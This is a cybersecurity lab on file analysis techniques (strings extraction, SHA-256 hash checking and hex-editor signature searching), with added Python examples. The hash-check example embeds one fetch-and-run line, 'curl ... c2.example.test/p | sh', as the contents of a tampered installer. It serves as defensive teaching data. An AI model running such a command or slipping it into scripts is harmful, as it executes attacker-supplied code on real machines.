Lab - Using File Analysis Techniques
Scenario
In this lab, you will learn about various file analysis techniques.
As a cybersecurity analyst, you are working to discover weaknesses and vulnerabilities that your organization, Structureality Inc., needs to mitigate throughout its internal network. In this lab, you will first extract strings from files. Next, you will obtain a file and confirm its integrity with hashing. Finally, you will view and search a file using a hex editor.
Your cybersecurity analyst (CySA) workstation, running Kali Linux, is located in Structureality’s server subnet.
Understand your environment
You will be working from a virtual machine named KALI hosting Kali Linux.
File analysis with strings
When you encounter an unknown file on a system, you need to determine what it is and what it will do. One file analysis technique is extracting the printable character sequences (strings) embedded in the file and reviewing them: paths, URLs, IP addresses, registry keys, error messages, and library or function names often reveal a file's purpose before you ever run it. Keep in mind that a packed, encrypted, or obfuscated file yields few meaningful strings, so an empty or nonsensical result is itself a clue. In this exercise, you will extract the strings from several files and view the contents.
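On the KALI workstation the command is simply `strings -t x FILE` (add `-e l` to catch UTF-16LE strings from Windows binaries and `-n N` to raise the minimum length). The following Python is an added example for this lab, not part of the original exercise, that re-implements the same technique so you can see what the tool actually does; the `SAMPLE` bytes are constructed to stand in for an unknown binary.

```python
"""Re-implementation of the technique behind `strings`: report runs of
printable characters found in arbitrary bytes, with their offsets.
Added example for this lab; the sample bytes are constructed, not a real file."""
import re

# Constructed stand-in for an unknown binary: an ELF-like header, a path,
# junk with runs too short to report, and one UTF-16LE string of the kind
# Windows executables carry (invisible to a plain ASCII scan).
SAMPLE = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00"
    + b"/usr/bin/python3\x00"
    + b"\x90\x90\x31\xc0ab\x00\xff"
    + "http://update.example.test/cfg".encode("utf-16-le")
    + b"\xff\xfe\x00"
)


def find_strings(data, min_len=4, encoding="ascii"):
    """Return (offset, text) for each printable run of at least min_len
    characters. encoding="ascii" mirrors plain `strings`; "utf-16le" mirrors
    `strings -e l`, which is how Windows-style wide strings are found."""
    if encoding == "ascii":
        pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
        codec = "ascii"
    elif encoding == "utf-16le":
        # one printable byte followed by a NUL, repeated min_len times or more
        pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
        codec = "utf-16-le"
    else:
        raise ValueError("encoding must be 'ascii' or 'utf-16le'")
    return [(m.start(), m.group().decode(codec)) for m in pattern.finditer(data)]


def all_strings(data, min_len=4):
    """ASCII and UTF-16LE runs together, ordered by offset, like running
    `strings -t x` and `strings -e l -t x` and merging the output."""
    found = find_strings(data, min_len, "ascii") + find_strings(data, min_len, "utf-16le")
    return sorted(found)


if __name__ == "__main__":
    for offset, text in all_strings(SAMPLE):
        print(f"{offset:x} {text}")  # same shape as `strings -t x`
```

Note that the ASCII scan alone misses the URL entirely because every character is followed by a NUL byte; that is why a second pass with `-e l` is routine when the file might have come from a Windows host.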
File analysis: hash check
When downloading files, it is important to confirm that the copy on the local drive is identical to the file offered on the download site. This is usually done by hashing: compute a cryptographic hash (for example SHA-256) of the local file and compare it with the digest the publisher provides. A match shows the file was not corrupted or altered in transit. A digest that sits next to the download on the same page can be replaced along with the file, so obtain it from a separate source or from a signed checksum file where possible. In this exercise, you will work on a downloaded file and perform a hash check of the file.
Info
An excellent use for hash checking is verifying that OS and application files have not been corrupted or tampered with. Hash matching also reveals the presence of known malware and, just as usefully, lets you exclude known, unmodified software files from a forensic examination. There are many places to obtain hash lists or databases. One great option is the NIST National Software Reference Library (NSRL), whose Reference Data Set lists hashes of known software.
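On Kali the hash check is `sha256sum installer.sh` to compute the digest and `sha256sum -c installer.sh.sha256` to compare it with a published digest file. The Python below is an added example for this lab, not part of the original exercise, covering both the integrity check described above and the known-good / known-bad lookup from the note: it parses a digest line in the same format `sha256sum` writes, verifies an intact and a tampered copy, and classifies each against two small hash sets. The file contents, the digest line, and both hash sets are constructed for the example; NSRL and threat feeds are the real-world sources they stand in for.

```python
"""Hash check of a downloaded file against a publisher's digest line, plus
lookup against known-good / known-bad hash sets. Added example for this
lab; the file contents and the hash sets are constructed."""
import hashlib
import hmac

# Constructed "download": what the publisher shipped, and a copy that was
# altered in transit (an extra line that fetches and runs remote code).
ORIGINAL = b"#!/bin/sh\necho 'installing agent'\n"
TAMPERED = b"#!/bin/sh\necho 'installing agent'\ncurl -s http://c2.example.test/p | sh\n"

# The digest line the publisher posts next to the download, in the format
# `sha256sum installer.sh` prints and `sha256sum -c` expects.
PUBLISHED_LINE = hashlib.sha256(ORIGINAL).hexdigest() + "  installer.sh"

# Stand-ins for hash lists: a known-software set (the role NSRL plays) and a
# malware set from a threat feed. Both constructed for this example.
KNOWN_GOOD = {hashlib.sha256(ORIGINAL).hexdigest()}
KNOWN_BAD = {hashlib.sha256(TAMPERED).hexdigest()}


def sha256_of(data, chunk=1 << 16):
    """Hash in chunks, as you would stream a large file from disk."""
    h = hashlib.sha256()
    for i in range(0, len(data), chunk):
        h.update(data[i:i + chunk])
    return h.hexdigest()


def parse_digest_line(line):
    """Parse 'HEX  name' or 'HEX *name' (binary-mode marker) from a .sha256 file."""
    digest, _, name = line.strip().partition(" ")
    digest = digest.lower()
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a SHA-256 digest line")
    return digest, name.lstrip(" *")


def verify(data, published_line):
    """True only if the computed digest equals the published one.
    compare_digest avoids leaking where the mismatch starts via timing."""
    expected, _ = parse_digest_line(published_line)
    return hmac.compare_digest(sha256_of(data), expected)


def classify(data, known_bad=KNOWN_BAD, known_good=KNOWN_GOOD):
    """Tell known malware, known software and unknown files apart by hash.
    Known-bad is checked first: a hash in both lists means a list is wrong."""
    digest = sha256_of(data)
    if digest in known_bad:
        return "known-bad"
    if digest in known_good:
        return "known-good"
    return "unknown"


if __name__ == "__main__":
    for name, blob in (("original", ORIGINAL), ("tampered", TAMPERED)):
        status = "verified" if verify(blob, PUBLISHED_LINE) else "MISMATCH"
        print(f"{name}: {status}, {classify(blob)}")
```

A single flipped byte changes the whole digest, so the tampered copy fails verification even though it starts with the same bytes; hash matching says nothing about files that are not in either list, which is why "unknown" is a result in its own right.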
File analysis with hexedit
Another file analysis technique is the use of a hex editor to view the contents of a file. Rather than automatically extracting content, a hex editor lets you view, search, and edit the raw bytes of a file, shown alongside their offsets and an ASCII rendering. You have to already know what to look for, so an initial strings pass is often needed to find starting points and search terms (a path, a URL, a file signature) to use in the hex editor.
You have now used a hex editor to look for strings or other content within a file. In a forensic investigation, the same technique can be applied to a disk image: searching for known file signatures (the magic bytes at the start of a PNG, PDF, or ZIP file) pinpoints the location of files that were deleted or damaged, even when the file system no longer references them. From there, file recovery, file undeletion, or file carving operations may be used in an attempt to recover full or partial access to the file.
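The Python below is an added example for this lab, not part of the original exercise. It reproduces the two things you just did in hexedit, view bytes at an offset and search for a pattern, and then applies the search to the forensic case described above: locating file headers in a slice of unallocated space. The `IMAGE` bytes are constructed (zeros with three headers planted at known offsets), and the `SIGNATURES` table is a short, hand-picked set of well-known magic numbers, not an exhaustive one.

```python
"""Hex-level inspection: dump bytes with offsets (what hexedit shows) and
search for byte patterns, including file signatures, which is how a hex
search on a disk image locates headers of deleted files for carving.
Added example for this lab; the sample image below is constructed."""

# Constructed slice of "unallocated space": zeros with three file headers
# left behind at different offsets.
IMAGE = (
    bytes(40)
    + b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"
    + bytes(30)
    + b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"
    + bytes(20)
    + b"PK\x03\x04"
    + bytes(8)
)

# A few magic numbers worth knowing by heart; extend as needed.
SIGNATURES = {
    "PNG": b"\x89PNG\r\n\x1a\n",
    "PDF": b"%PDF-",
    "ZIP": b"PK\x03\x04",
    "ELF": b"\x7fELF",
    "JPEG": b"\xff\xd8\xff",
    "PE/MZ": b"MZ",
}


def hexdump(data, start=0, length=None, width=16):
    """Render data[start:start+length] in the offset / hex / ASCII layout
    that hexedit and `xxd` use."""
    end = len(data) if length is None else min(len(data), start + length)
    lines = []
    for off in range(start, end, width):
        chunk = data[off:min(off + width, end)]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        text = "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart:<{width * 3 - 1}}  |{text}|")
    return "\n".join(lines)


def find_all(data, needle):
    """Every offset where needle occurs (like repeating hexedit's search).
    needle may be bytes or a hex string such as '89 50 4e 47'."""
    if isinstance(needle, str):
        needle = bytes.fromhex(needle)
    hits, i = [], data.find(needle)
    while i != -1:
        hits.append(i)
        i = data.find(needle, i + 1)  # +1 so overlapping hits are reported too
    return hits


def find_signatures(data, signatures=SIGNATURES):
    """(offset, type) for every known header in the blob, ordered by offset:
    the starting points a carving pass would work from."""
    found = [(off, name) for name, magic in signatures.items() for off in find_all(data, magic)]
    return sorted(found)


if __name__ == "__main__":
    for off, kind in find_signatures(IMAGE):
        print(f"{kind} header at 0x{off:x}")
        print(hexdump(IMAGE, off, 16))
```

The signature hits are only starting points: a carving tool still has to decide where each file ends (a trailer such as PNG's IEND chunk, a length field, or a fixed maximum), and a short signature like `MZ` will produce false positives in any large image, so confirm each hit by reading the bytes around it in the dump.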